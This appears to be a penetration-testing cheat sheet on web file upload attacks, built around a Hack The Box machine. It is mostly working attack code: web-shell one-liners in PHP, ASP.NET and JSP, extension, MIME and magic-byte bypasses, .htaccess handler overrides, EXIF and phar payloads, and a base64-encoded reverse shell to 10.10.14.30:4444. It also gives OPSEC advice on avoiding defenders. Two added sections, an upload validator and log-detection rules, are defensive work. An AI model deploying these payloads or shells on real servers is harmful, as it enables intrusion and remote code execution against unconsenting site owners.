# File Upload Attacks

## Overview

File upload vulnerabilities let an attacker place files of their choosing on a web server by bypassing file type and content validation. When an application does not validate uploaded files properly, an attacker can upload a web shell or other server-side script and obtain remote code execution. File upload attacks are particularly effective when chained with Local File Inclusion (LFI), which executes the uploaded file even when the upload directory itself is restricted from serving scripts.

## Prerequisites

- Identified file upload form or API endpoint
- Burp Suite or proxy for request interception
- Knowledge of target web technology (PHP, ASP.NET, JSP, etc.)
- Web shell payload in the appropriate server-side language

## Detection & Enumeration

### Identifying Upload Endpoints

```bash
# Scan for common upload paths
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \
  -u http://target.htb -t 50 | grep -iE "upload|file|avatar|image|media|attach"

# Check for file upload in profile/avatar settings
# Check for import/document upload functionality
# Check CMS plugins allowing media upload
```

### Testing Upload Validation

```bash
# Create a basic PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# Attempt direct upload -- observe server response
curl -X POST http://target.htb/upload.php -F "file=@shell.php" -v
```

## Exploitation / Execution

### Extension Bypass Techniques

```bash
# Double extension bypass -- server strips last extension
cp shell.php shell.jpg.php         # If only last extension checked
cp shell.php shell.php.jpg         # If Apache misconfiguration
cp shell.php shell.php5            # Unregistered PHP versions
cp shell.php shell.phtml           # Alternative PHP extension
cp shell.php shell.pHp             # Case variation
cp shell.php shell.phar            # PHP archive format

# Null byte injection (legacy PHP < 5.3.4)
curl -X POST http://target.htb/upload.php \
  -F "file=@shell.php;filename=shell.php%00.jpg"

# Trailing dot / space (Windows file system)
curl -X POST http://target.htb/upload.php \
  -F "file=@shell.php;filename=shell.php."
curl -X POST http://target.htb/upload.php \
  -F "file=@shell.php;filename=shell.php "
```

### MIME Type Spoofing

```bash
# Intercept upload request in Burp, change Content-Type header
# From: Content-Type: application/x-php
# To:   Content-Type: image/jpeg

# Using curl to spoof MIME
curl -X POST http://target.htb/upload.php \
  -H "Content-Type: multipart/form-data" \
  -F "file=@shell.php;type=image/jpeg"

# Common allowed MIME types:
# image/jpeg, image/png, image/gif, application/pdf, text/plain
```

### Magic Bytes Bypass

```bash
# GIF89a header -- prepend magic bytes to PHP shell
printf 'GIF89a;\n<?php system($_GET["cmd"]); ?>' > shell.gif.php

# PNG header -- more realistic for image validation
printf '\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90wS\xde\n<?php system($_GET["cmd"]); ?>' > shell.png.php

# JPEG header
printf '\xff\xd8\xff\xe0\n<?php system($_GET["cmd"]); ?>' > shell.jpg.php
```
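Added example (not from the original module): a server-side validator, written here in Python for a hypothetical image-upload handler, that rejects each of the extension, MIME and magic-byte tricks in the three sections above. It assumes a JPEG/PNG/GIF-only allowlist, ignores the client-supplied Content-Type entirely, and treats the `<?php` content scan as a heuristic second layer on top of the real control, which is never executing scripts from the upload directory.

```python
import secrets

# Constructed policy for a hypothetical image-upload handler: extension allowlist mapped to
# the magic bytes a file with that extension must start with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
# Heuristic content scan for the GIF89a/PNG/JPEG + PHP polyglots and EXIF-comment payloads.
# Second layer only: the primary control is never executing scripts from the upload directory.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%@")

def validate_upload(filename, content):
    """Return (accepted, reason). The client's Content-Type is deliberately not an input:
    it is attacker-controlled, so MIME spoofing has nothing to act on."""
    # Null bytes / control characters: shell.php%00.jpg
    if any(ord(c) < 32 for c in filename):
        return False, "control character in filename"
    # Strip any directory part (also backslashes, for Windows-style paths)
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Trailing dot or space: "shell.php." / "shell.php " (Windows drops them on write)
    if base != base.rstrip(". "):
        return False, "trailing dot or space"
    # Dotfiles such as .htaccess
    if base.startswith("."):
        return False, "hidden file or .htaccess"
    # Exactly one extension: rejects shell.jpg.php and shell.php.jpg (and a legitimate
    # "my.photo.jpg", an accepted cost of the strict rule)
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "multiple or missing extensions"
    ext = parts[1]  # lowercased, so shell.pHp is just .php
    if ext not in ALLOWED:  # allowlist, so .php5/.phtml/.phar never match
        return False, f"extension .{ext} not allowed"
    if not content.startswith(ALLOWED[ext]):
        return False, "magic bytes do not match extension"
    if any(m in content for m in SCRIPT_MARKERS):
        return False, "embedded script tag"
    return True, ext

def stored_name(ext):
    """Server-chosen random name: the client-supplied filename never reaches disk."""
    return f"{secrets.token_hex(16)}.{ext}"
```

Even with these checks, the upload directory should live outside the web root or have script execution disabled, so that a file which slips through is served as bytes rather than run.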

### .htaccess Upload to Enable PHP Execution

```bash
# Create .htaccess to allow PHP in uploads directory
echo 'AddType application/x-httpd-php .jpg' > .htaccess
# Upload .htaccess to the uploads directory
# Now any .jpg with PHP code will execute as PHP

# Alternative: set PHP handler for custom extension
echo 'AddHandler application/x-httpd-php .backup' > .htaccess

# Apache SetHandler directive
echo 'SetHandler application/x-httpd-php' > .htaccess

# Upload via curl
curl -X POST http://target.htb/upload.php \
  -F "file=@.htaccess;filename=.htaccess"
```

### File Upload + LFI Chain (Usage HTB Technique)

```bash
# 1. Create PHP shell, rename to .jpg
echo '<?php system($_GET["melo"]); ?>' > shell.jpg

# 2. Upload, intercept in Burp, change filename to shell.jpg.php
# Proxy: change filename= parameter to "shell.jpg.php"

# 3. Access the uploaded file directly
curl 'http://admin.usage.htb/uploads/images/shell.jpg.php?melo=id'
# uid=1000(dash) gid=1000(dash) groups=1000(dash)

# 4. Upgrade to reverse shell
curl 'http://admin.usage.htb/uploads/images/shell.jpg.php?melo=echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMzAvNDQ0NCAwPiYx | base64 -d | bash'
```

### PHP Code in Image EXIF Data

```bash
# Inject PHP code into image EXIF metadata
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Upload as profile avatar or gallery image
# Execute via LFI: page=uploads/avatar.jpg
```

### Phar Deserialization via File Upload

```bash
# Create a malicious PHAR file that triggers deserialization when accessed
# Requires a class with __destruct() or __wakeup() magic method in the codebase
phpggc -p phar -o exploit.phar <gadget-chain> <command>

# Upload exploit.phar, trigger via phar:// wrapper in the LFI parameter
curl 'http://target.htb/?page=phar://uploads/exploit.phar/test.txt'
```

### Client-Side Validation Bypass

```bash
# JavaScript-only validation bypass:
# 1. Open browser Developer Tools
# 2. Find and disable the validation function
# 3. Or intercept with Burp and send original .php file regardless of client warning

# Direct curl bypass (completely skips client-side checks)
curl -X POST http://target.htb/upload.php \
  -F "file=@shell.php;filename=shell.php"
```

### Common Web Shell One-Liners

```bash
# PHP
echo '<?php system($_GET["c"]); ?>' > shell.php
echo '<?php echo shell_exec($_GET["c"]); ?>' > shell.php
echo '<pre><?php passthru($_REQUEST["c"]); ?></pre>' > shell.php

# ASP.NET
echo '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe","/c " + Request["c"]); %>' > shell.aspx

# JSP
echo '<% Runtime.getRuntime().exec(request.getParameter("c")); %>' > shell.jsp
```

## Common Pitfalls

- Extension blacklist incomplete -- try .php5, .phtml, .pht, .phar, .shtml, .php7
- Uploaded file accessible but not executed -- check if upload directory has PHP handler disabled
- 502/503 on webshell access -- PHP code may have syntax errors or be blocked by WAF
- File renamed with random string -- use LFI to locate the file, or check response for new filename
- Double extension not working -- try different variations: shell.php%00.jpg, shell.asp;.jpg

## OPSEC Considerations

- Uploading .htaccess files is highly suspicious and may trigger file integrity monitoring
- Multiple extension variants in rapid succession generate anomalous upload patterns
- Web shells with simple names (shell.php, cmd.php) are easily discovered by defenders
- GIF89a+PHP hybrid files may fail image processing checks and generate errors in logs
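Added example (not part of the original module): access-log detection logic in Python for the request patterns the techniques above leave behind (script extensions under the upload path, image.php double extensions, phar:// wrappers, shell commands in query strings), run over constructed Apache combined-format lines. The IPs, paths, query values and rule names are assumptions made for the sample.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines modelled on the requests shown in this module.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:22 +0000] "POST /upload.php HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.7 - - [12/Mar/2024:10:01:25 +0000] "GET /uploads/images/shell.jpg.php?melo=id HTTP/1.1" 200 77 "-" "curl/8.4.0"
198.51.100.7 - - [12/Mar/2024:10:01:40 +0000] "GET /index.php?page=phar://uploads/exploit.phar/test.txt HTTP/1.1" 200 1024 "-" "curl/8.4.0"
198.51.100.7 - - [12/Mar/2024:10:02:03 +0000] "GET /uploads/images/shell.jpg.php?melo=echo%20Yg%3D%3D%20%7C%20base64%20-d%20%7C%20bash HTTP/1.1" 200 0 "-" "curl/8.4.0"
203.0.113.9 - - [12/Mar/2024:10:03:00 +0000] "GET /uploads/images/a3f9c1.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SCRIPT_EXT = r"\.(?:php\d?|phtml|pht|phar|shtml|aspx?|jsp)"
RULES = [
    # Anything with a server-side script extension below an uploads directory
    ("script-in-uploads", re.compile(r"/uploads?/.*" + SCRIPT_EXT + r"(?:[?/]|$)", re.I)),
    # image.php style double extensions anywhere in the path
    ("double-extension", re.compile(r"\.(?:jpe?g|png|gif)" + SCRIPT_EXT + r"(?:[?/]|$)", re.I)),
    # PHP stream wrappers in a parameter (phar deserialization, LFI filters)
    ("phar-wrapper", re.compile(r"(?:phar|php|data)://", re.I)),
    # Shell-command fragments inside the query string
    ("shell-command-arg", re.compile(r"\?.*(?:base64\s+-d|/dev/tcp|/bin/(?:ba)?sh|whoami)", re.I)),
]

def scan_access_log(text):
    """Return [(ip, rule_name, decoded request target)] for every line matching a rule."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(m["target"])  # decode first so %20 / %7C cannot hide the command
        for name, rx in RULES:
            if rx.search(target):
                alerts.append((m["ip"], name, target))
    return alerts

def suspicious_ips(text, min_alerts=2):
    """IPs with at least min_alerts rule hits, for triage ordering."""
    counts = {}
    for ip, _, _ in scan_access_log(text):
        counts[ip] = counts.get(ip, 0) + 1
    return {ip for ip, n in counts.items() if n >= min_alerts}
```

Pair these log rules with file-integrity monitoring on the upload directory, since the .htaccess upload itself goes through the same POST as a legitimate image and is invisible in the access log.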

## Post-Exploitation Value

- Remote code execution as the web server user
- Persistence through multiple webshells in writable directories
- File system enumeration via webshell
- Platform for further exploitation of internal services

## Cross-References

### Tool References

| Tool | Link |
|---|---|
| Burp Suite | https://portswigger.net/burp |
| exiftool | https://exiftool.org |
| phpggc | https://github.com/ambionics/phpggc |
| RevShells | https://www.revshells.com |

### Source Machines

- Usage (Easy, Linux) -- Laravel admin avatar upload: rename .php to .jpg, intercept, append .php extension